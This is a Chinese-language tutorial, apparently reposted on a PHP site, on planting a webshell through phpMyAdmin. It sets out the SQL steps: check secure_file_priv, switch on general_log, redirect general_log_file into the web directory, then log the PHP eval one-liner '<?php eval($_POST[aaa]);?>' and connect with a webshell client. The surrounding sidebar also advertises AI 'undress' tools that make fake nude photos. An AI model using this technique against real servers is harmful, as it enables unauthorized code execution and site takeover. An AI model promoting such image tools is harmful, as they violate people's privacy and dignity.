搜索
首页数据库phpMyAdmin关于phpmyadmin新姿势getshell

关于phpmyadmin新姿势getshell

Dec 29, 2020 pm 05:08 PM
phpmyadmin

下面由phpmyadmin使用教程栏目给大家介绍phpmyadmin新姿势getshell,希望对需要的朋友有所帮助!

关于phpmyadmin新姿势getshell

百度百科:phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性。

通俗的讲 其作用就是可以在web页面方便的操作数据库。

当我们得到一个站点的phpmyadmin页面时,下一步要做的就是getshell。

可以通过写shell进行提权,而我们需要满足以下条件:

1.数据库root权限

2.知道网站的物理路径

3.数据库有写权限

通过  select '64d8a9f9d2660d1aa18735456c689d78' INTO OUTFILE '网站物理路径' 写入shell 

本文主要讲的是在条件3不满足的情况下成功getshell。

 利用条件:MySQL 5.0+

MySQL 5.0+的版本会自动创建日志文件,那么在服务运行的情况下修改全局变量也是可以变动文件位置的,但是必须要对生成日志的目录有可读可写的权限。

(Linux环境下可能会比较苛刻,因为站点目录是一个用户,MySQL是另外一个用户,权限管控较为严格,主要取决于权限配置是否得当)

首先我们测试站点是否有写权限

执行sql语句               SHOW VARIABLES LIKE 'secure_file_priv'

sql语句 SHOW VARIABLES LIKE 'secure_file_priv'  进行查询 查找secure_file_priv

secure-file-priv特性
secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。

  • 当secure_file_priv的值为null ,表示限制mysql 不允许导入|导出

  • 当secure_file_priv的值为/tmp/ ,表示限制mysql 的导入|导出只能发生在/tmp/目录下

  • 当secure_file_priv的值没有具体值时,表示不对mysql 的导入|导出做限制

可以在mysql-ini文件中设置其属性

经测试,我们没有写权限

 

然后再介绍两个MySQL全局变量(general_log、general_log file

  1. general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。
  2. general log file 指的是日志的保存路径。

我们可以通过将一句话木马写入mysql日志中然后移动mysql日志路径到网站目录下实现getshell

执行sql语句   SHOW VARIABLES LIKE 'general_log%'  进行模糊查询

日志默认关闭

我们执行sql语句    

set global general_log = "ON";     #开启日志
SET global general_log_file='网站下物理路径';  #更换日志路径

成功创建   

 然后执行特殊的查询语句

select  &#39;<?php eval($_POST[aaa]);?>&#39;

我们进入112233.php进行验证,成功写入shell

 最后进行菜刀连接,获得站点webshell

 

以上是关于phpmyadmin新姿势getshell的详细内容。更多信息请关注PHP中文网其他相关文章!

声明
本文转载于:csdn。如有侵权,请联系admin@php.cn删除
使用PHPMYADMIN:数据库管理员指南使用PHPMYADMIN:数据库管理员指南Apr 25, 2025 am 12:12 AM

phpMyAdmin是一个基于Web的MySQL数据库管理工具,提供了直观的界面来管理数据库。1.它允许创建、修改、删除数据库和表,执行SQL查询,导入导出数据,进行用户管理和权限设置。2.通过与MySQL服务器建立连接,phpMyAdmin将用户请求转换为SQL命令并执行。3.基本用法包括查看表数据,高级用法支持复杂SQL查询。4.常见错误如连接失败和查询语法错误可以通过检查服务器状态和使用SQL编辑器调试。5.性能优化可以通过为常用字段创建索引,定期备份数据库和保持结构整洁来实现。

了解关系:mysql和phpmyadmin了解关系:mysql和phpmyadminApr 24, 2025 am 12:05 AM

MySQL和phpMyAdmin的关系是MySQL存储数据,phpMyAdmin通过HTTP协议管理这些数据。1.MySQL是开源的关系型数据库管理系统,支持多种操作系统和项目需求。2.phpMyAdmin是基于Web的工具,提供直观界面管理MySQL数据库,支持SQL查询和数据导入导出。3.phpMyAdmin通过生成SQL查询与MySQL服务器通信,用户可通过界面操作数据库。4.使用phpMyAdmin可以创建数据库和表,执行查询,导入导出数据,并支持高级功能如优化查询和管理权限。

phpmyadmin和mysql:完美的组合phpmyadmin和mysql:完美的组合Apr 23, 2025 am 12:04 AM

phpMyAdminandMySQLtogetherenhancedatabasemanagementbyprovidingeaseandefficiency.1)phpMyAdminoffersauser-friendlyinterfaceformanagingMySQLdatabases,2)itallowsforeasyexecutionofSQLqueries,import/exportofdatabases,andmanagementofuserpermissions,3)itaids

MySQL和PhpMyAdmin:核心功能和功能MySQL和PhpMyAdmin:核心功能和功能Apr 22, 2025 am 12:12 AM

MySQL和phpMyAdmin是强大的数据库管理工具。1)MySQL用于创建数据库和表、执行DML和SQL查询。2)phpMyAdmin提供直观界面进行数据库管理、表结构管理、数据操作和用户权限管理。

phpMyAdmin:生成和执行SQL查询phpMyAdmin:生成和执行SQL查询Apr 21, 2025 am 12:03 AM

在phpMyAdmin中生成和执行SQL查询的方法包括:1.在SQL标签页输入查询并点击执行;2.使用JOIN合并表数据;3.优化查询时使用索引和LIMIT。phpMyAdmin通过直观的界面简化了数据库管理,支持从基础到高级的SQL查询操作。

mysql和phpmyadmin:他们如何一起工作mysql和phpmyadmin:他们如何一起工作Apr 20, 2025 am 12:05 AM

我们需要将数据库管理和用户友好的界面结合起来,因为这样可以提高效率和便捷性。1)MySQL处理复杂的数据存储和查询,2)phpMyAdmin提供直观的Web界面简化管理,3)两者协作通过SQL命令实现数据操作,4)phpMyAdmin将结果以用户友好的方式展示。

phpmyadmin和SQL:探索连接phpmyadmin和SQL:探索连接Apr 19, 2025 am 12:05 AM

phpMyAdmin通过生成和执行SQL语句来管理MySQL数据库。1.用户通过Web界面操作,2.phpMyAdmin生成SQL语句,3.发送到MySQL服务器执行,4.返回结果并在浏览器中显示。

PhpMyAdmin:解释的关键功能和功能PhpMyAdmin:解释的关键功能和功能Apr 18, 2025 am 12:04 AM

phpMyAdmin是一种基于Web的MySQL数据库管理工具,通过图形用户界面(GUI)允许用户管理数据库。1.它通过PHP脚本与MySQL数据库交互,将用户操作转换为SQL查询并呈现结果。2.基本用法包括创建数据库和表,如创建名为'my_database'的数据库和'users'表。3.高级用法支持复杂查询和用户权限管理,如查找特定用户名的用户。4.常见错误调试技巧包括检查SQL语法、管理权限和查看日志。5.性能优化建议包括索引优化、查询优化和确保安全性。

See all articles

热AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智能驱动的应用程序,用于创建逼真的裸体照片

AI Clothes Remover

AI Clothes Remover

用于从照片中去除衣服的在线人工智能工具。

Undress AI Tool

Undress AI Tool

免费脱衣服图片

Clothoff.io

Clothoff.io

AI脱衣机

Video Face Swap

Video Face Swap

使用我们完全免费的人工智能换脸工具轻松在任何视频中换脸!

热工具

SublimeText3 Mac版

SublimeText3 Mac版

神级代码编辑软件(SublimeText3)

mPDF

mPDF

mPDF是一个PHP库,可以从UTF-8编码的HTML生成PDF文件。原作者Ian Back编写mPDF以从他的网站上“即时”输出PDF文件,并处理不同的语言。与原始脚本如HTML2FPDF相比,它的速度较慢,并且在使用Unicode字体时生成的文件较大,但支持CSS样式等,并进行了大量增强。支持几乎所有语言,包括RTL(阿拉伯语和希伯来语)和CJK(中日韩)。支持嵌套的块级元素(如P、DIV),

适用于 Eclipse 的 SAP NetWeaver 服务器适配器

适用于 Eclipse 的 SAP NetWeaver 服务器适配器

将Eclipse与SAP NetWeaver应用服务器集成。

SublimeText3 Linux新版

SublimeText3 Linux新版

SublimeText3 Linux最新版

EditPlus 中文破解版

EditPlus 中文破解版

体积小,语法高亮,不支持代码提示功能